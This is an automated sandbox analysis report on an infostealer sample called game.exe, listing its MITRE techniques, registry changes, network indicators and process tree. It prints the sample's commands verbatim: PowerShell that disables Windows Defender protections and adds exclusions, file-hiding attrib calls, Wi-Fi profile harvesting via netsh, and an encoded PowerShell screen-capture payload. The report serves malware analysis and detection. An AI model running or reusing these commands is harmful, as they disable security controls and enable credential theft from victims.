2e24c77c1e27a77e8312a9961b0dffb937decf175cf71e077fc2f4b31cec7e7f

Analysis

max time kernel
8s
max time network
127s
platform
windows10-2004_x64
resource
win10v2004-20240426-en
resource tags

arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
submitted
11-05-2024 08:52

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

game.exe
Size

9.5MB
MD5

a3f779e15e40e6ceafb62093600431da
SHA1

b6e8a2114ae00e16f976859679a67c576beeaad1
SHA256

2e24c77c1e27a77e8312a9961b0dffb937decf175cf71e077fc2f4b31cec7e7f
SHA512

60463509850ecffdd941b24f98d19b74db976632bbf9ff07dbe0e00d528a10589ee978ad3cf395edeaf7efcd834568cfeff1dfc42d32c29b4871d7c1e84243fc
SSDEEP

98304:xE5p/yYPMhNSn53O50TL523tEEGSF8poju:wlyYPi8M50TLQ3+Eioju

Score

8^/10

execution persistence spyware stealer

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exe

pid process

3600 powershell.exe
4140 powershell.exe

pid	process
3600	powershell.exe
4140	powershell.exe

Drops file in Drivers directory 3 IoCs

Processes:

game.exeattrib.exeattrib.exe

description	ioc	process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	game.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

game.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio Universal Service = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Protect\\SecurityHealthSystray.exe"	game.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service
T1102

Processes:

flow ioc

15 discord.com
16 discord.com
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

3 api.ipify.org
4 api.ipify.org
8 ip-api.com

flow	ioc
15	discord.com
16	discord.com

flow	ioc
3	api.ipify.org
4	api.ipify.org
8	ip-api.com

Maps connected drives based on registry 3 TTPs 2 IoCs

Disk information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

game.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0	game.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	game.exe

Detects videocard installed 1 TTPs 2 IoCs
Uses WMIC.exe to determine videocard installed.

System Information Discovery
T1082

Processes:

wmic.exewmic.exe

pid process

624 wmic.exe
4640 wmic.exe
GoLang User-Agent 1 IoCs
Uses default user-agent string defined by GoLang HTTP packages.

Processes:

description flow ioc

HTTP User-Agent header 10 Go-http-client/1.1

pid	process
624	wmic.exe
4640	wmic.exe

description	flow	ioc
HTTP User-Agent header	10	Go-http-client/1.1

Modifies system certificate store 2 TTPs 6 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

Processes:

game.exe

description	ioc	process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 5c000000010000000400000000080000190000000100000010000000a823b4a20180beb460cab955c24d7e21030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c7e00000001000000080000000000042beb77d5017a000000010000000c000000300a06082b060105050703097f000000010000000c000000300a06082b060105050703091d00000001000000100000006ee7f3b060d10e90a31ba3471b999236140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b620000000100000020000000ebd41040e4bb3ec742c9e381d31ef2a41a48b6685c96e7cef3c1df6cd4331c990b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520031000000530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000068000000306606082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050508020206082b0601050507030606082b0601050507030706082b0601050507030906082b0601050507030106082b060105050703080f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d0400000001000000100000003e455215095192e1b75d379fb187298a200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0	game.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8	game.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	game.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 5c0000000100000004000000001000001900000001000000100000002fe1f70bb05d7c92335bc5e05b984da60f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f63030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e814000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e20000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	game.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C	game.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 0400000001000000100000003e455215095192e1b75d379fb187298a0f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d090000000100000068000000306606082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050508020206082b0601050507030606082b0601050507030706082b0601050507030906082b0601050507030106082b06010505070308530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520031000000620000000100000020000000ebd41040e4bb3ec742c9e381d31ef2a41a48b6685c96e7cef3c1df6cd4331c99140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b1d00000001000000100000006ee7f3b060d10e90a31ba3471b9992367f000000010000000c000000300a06082b060105050703097a000000010000000c000000300a06082b060105050703097e00000001000000080000000000042beb77d501030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c190000000100000010000000a823b4a20180beb460cab955c24d7e21200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0	game.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

game.exepowershell.exepowershell.exe

pid	process
1536	game.exe
1536	game.exe
1536	game.exe
1536	game.exe
1536	game.exe
1536	game.exe
1536	game.exe
3600	powershell.exe
1536	game.exe
1536	game.exe
1536	game.exe
1536	game.exe
3600	powershell.exe
1536	game.exe
1536	game.exe
1536	game.exe
1536	game.exe
1536	game.exe
1536	game.exe
1536	game.exe
1536	game.exe
1536	game.exe
1536	game.exe
1536	game.exe
1536	game.exe
1536	game.exe
1536	game.exe
1536	game.exe
1536	game.exe
3576	powershell.exe
1536	game.exe
1536	game.exe
3576	powershell.exe
1536	game.exe
1536	game.exe
1536	game.exe
1536	game.exe
1536	game.exe
1536	game.exe
1536	game.exe
1536	game.exe
1536	game.exe
1536	game.exe
1536	game.exe
1536	game.exe
1536	game.exe
1536	game.exe
1536	game.exe
1536	game.exe
1536	game.exe
1536	game.exe
1536	game.exe
1536	game.exe
1536	game.exe
1536	game.exe
1536	game.exe
1536	game.exe
1536	game.exe
1536	game.exe
1536	game.exe
1536	game.exe
1536	game.exe
1536	game.exe
1536	game.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

game.exewmic.exewmic.exe

description	pid	process
Token: SeDebugPrivilege	1536	game.exe
Token: SeIncreaseQuotaPrivilege	3260	wmic.exe
Token: SeSecurityPrivilege	3260	wmic.exe
Token: SeTakeOwnershipPrivilege	3260	wmic.exe
Token: SeLoadDriverPrivilege	3260	wmic.exe
Token: SeSystemProfilePrivilege	3260	wmic.exe
Token: SeSystemtimePrivilege	3260	wmic.exe
Token: SeProfSingleProcessPrivilege	3260	wmic.exe
Token: SeIncBasePriorityPrivilege	3260	wmic.exe
Token: SeCreatePagefilePrivilege	3260	wmic.exe
Token: SeBackupPrivilege	3260	wmic.exe
Token: SeRestorePrivilege	3260	wmic.exe
Token: SeShutdownPrivilege	3260	wmic.exe
Token: SeDebugPrivilege	3260	wmic.exe
Token: SeSystemEnvironmentPrivilege	3260	wmic.exe
Token: SeRemoteShutdownPrivilege	3260	wmic.exe
Token: SeUndockPrivilege	3260	wmic.exe
Token: SeManageVolumePrivilege	3260	wmic.exe
Token: 33	3260	wmic.exe
Token: 34	3260	wmic.exe
Token: 35	3260	wmic.exe
Token: 36	3260	wmic.exe
Token: SeIncreaseQuotaPrivilege	3260	wmic.exe
Token: SeSecurityPrivilege	3260	wmic.exe
Token: SeTakeOwnershipPrivilege	3260	wmic.exe
Token: SeLoadDriverPrivilege	3260	wmic.exe
Token: SeSystemProfilePrivilege	3260	wmic.exe
Token: SeSystemtimePrivilege	3260	wmic.exe
Token: SeProfSingleProcessPrivilege	3260	wmic.exe
Token: SeIncBasePriorityPrivilege	3260	wmic.exe
Token: SeCreatePagefilePrivilege	3260	wmic.exe
Token: SeBackupPrivilege	3260	wmic.exe
Token: SeRestorePrivilege	3260	wmic.exe
Token: SeShutdownPrivilege	3260	wmic.exe
Token: SeDebugPrivilege	3260	wmic.exe
Token: SeSystemEnvironmentPrivilege	3260	wmic.exe
Token: SeRemoteShutdownPrivilege	3260	wmic.exe
Token: SeUndockPrivilege	3260	wmic.exe
Token: SeManageVolumePrivilege	3260	wmic.exe
Token: 33	3260	wmic.exe
Token: 34	3260	wmic.exe
Token: 35	3260	wmic.exe
Token: 36	3260	wmic.exe
Token: SeIncreaseQuotaPrivilege	624	wmic.exe
Token: SeSecurityPrivilege	624	wmic.exe
Token: SeTakeOwnershipPrivilege	624	wmic.exe
Token: SeLoadDriverPrivilege	624	wmic.exe
Token: SeSystemProfilePrivilege	624	wmic.exe
Token: SeSystemtimePrivilege	624	wmic.exe
Token: SeProfSingleProcessPrivilege	624	wmic.exe
Token: SeIncBasePriorityPrivilege	624	wmic.exe
Token: SeCreatePagefilePrivilege	624	wmic.exe
Token: SeBackupPrivilege	624	wmic.exe
Token: SeRestorePrivilege	624	wmic.exe
Token: SeShutdownPrivilege	624	wmic.exe
Token: SeDebugPrivilege	624	wmic.exe
Token: SeSystemEnvironmentPrivilege	624	wmic.exe
Token: SeRemoteShutdownPrivilege	624	wmic.exe
Token: SeUndockPrivilege	624	wmic.exe
Token: SeManageVolumePrivilege	624	wmic.exe
Token: 33	624	wmic.exe
Token: 34	624	wmic.exe
Token: 35	624	wmic.exe
Token: 36	624	wmic.exe

Suspicious use of WriteProcessMemory 32 IoCs

Processes:

game.exepowershell.execsc.exe

description	pid	process	target process
PID 1536 wrote to memory of 232	1536	game.exe	attrib.exe
PID 1536 wrote to memory of 232	1536	game.exe	attrib.exe
PID 1536 wrote to memory of 1048	1536	game.exe	attrib.exe
PID 1536 wrote to memory of 1048	1536	game.exe	attrib.exe
PID 1536 wrote to memory of 3260	1536	game.exe	wmic.exe
PID 1536 wrote to memory of 3260	1536	game.exe	wmic.exe
PID 1536 wrote to memory of 624	1536	game.exe	wmic.exe
PID 1536 wrote to memory of 624	1536	game.exe	wmic.exe
PID 1536 wrote to memory of 460	1536	game.exe	wmic.exe
PID 1536 wrote to memory of 460	1536	game.exe	wmic.exe
PID 1536 wrote to memory of 3600	1536	game.exe	powershell.exe
PID 1536 wrote to memory of 3600	1536	game.exe	powershell.exe
PID 1536 wrote to memory of 4832	1536	game.exe	wmic.exe
PID 1536 wrote to memory of 4832	1536	game.exe	wmic.exe
PID 1536 wrote to memory of 4640	1536	game.exe	wmic.exe
PID 1536 wrote to memory of 4640	1536	game.exe	wmic.exe
PID 1536 wrote to memory of 3576	1536	game.exe	powershell.exe
PID 1536 wrote to memory of 3576	1536	game.exe	powershell.exe
PID 1536 wrote to memory of 2768	1536	game.exe	wmic.exe
PID 1536 wrote to memory of 2768	1536	game.exe	wmic.exe
PID 1536 wrote to memory of 4740	1536	game.exe	netsh.exe
PID 1536 wrote to memory of 4740	1536	game.exe	netsh.exe
PID 1536 wrote to memory of 2352	1536	game.exe	attrib.exe
PID 1536 wrote to memory of 2352	1536	game.exe	attrib.exe
PID 1536 wrote to memory of 4908	1536	game.exe	attrib.exe
PID 1536 wrote to memory of 4908	1536	game.exe	attrib.exe
PID 1536 wrote to memory of 4140	1536	game.exe	powershell.exe
PID 1536 wrote to memory of 4140	1536	game.exe	powershell.exe
PID 4140 wrote to memory of 3096	4140	powershell.exe	csc.exe
PID 4140 wrote to memory of 3096	4140	powershell.exe	csc.exe
PID 3096 wrote to memory of 2916	3096	csc.exe	cvtres.exe
PID 3096 wrote to memory of 2916	3096	csc.exe	cvtres.exe

Views/modifies file attributes 1 TTPs 4 IoCs
evasion

Hidden Files and Directories
T1564.001

Processes:

attrib.exeattrib.exeattrib.exeattrib.exe

pid process

4908 attrib.exe
232 attrib.exe
1048 attrib.exe
2352 attrib.exe

pid	process
4908	attrib.exe
232	attrib.exe
1048	attrib.exe
2352	attrib.exe

C:\Users\Admin\AppData\Local\Temp\game.exe
"C:\Users\Admin\AppData\Local\Temp\game.exe"
1⤵
- Drops file in Drivers directory
- Adds Run key to start application
- Maps connected drives based on registry
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1536

C:\Windows\system32\attrib.exe
attrib +h +s C:\Users\Admin\AppData\Local\Temp\game.exe
2⤵
- Views/modifies file attributes
PID:232

C:\Windows\system32\attrib.exe
attrib +h +s C:\Users\Admin\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe
2⤵
- Views/modifies file attributes
PID:1048

C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get UUID
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3260

C:\Windows\System32\Wbem\wmic.exe
wmic path win32_VideoController get name
2⤵
- Detects videocard installed
- Suspicious use of AdjustPrivilegeToken
PID:624

C:\Windows\System32\Wbem\wmic.exe
wmic os get Caption
2⤵
PID:460

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\game.exe
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3600

C:\Windows\System32\Wbem\wmic.exe
wmic cpu get Name
2⤵
PID:4832

C:\Windows\System32\Wbem\wmic.exe
wmic path win32_VideoController get name
2⤵
- Detects videocard installed
PID:4640

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:3576

C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get UUID
2⤵
PID:2768

C:\Windows\system32\netsh.exe
netsh wlan show profiles
2⤵
PID:4740

C:\Windows\system32\attrib.exe
attrib -r C:\Windows\System32\drivers\etc\hosts
2⤵
- Drops file in Drivers directory
- Views/modifies file attributes
PID:2352

C:\Windows\system32\attrib.exe
attrib +r C:\Windows\System32\drivers\etc\hosts
2⤵
- Drops file in Drivers directory
- Views/modifies file attributes
PID:4908

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcw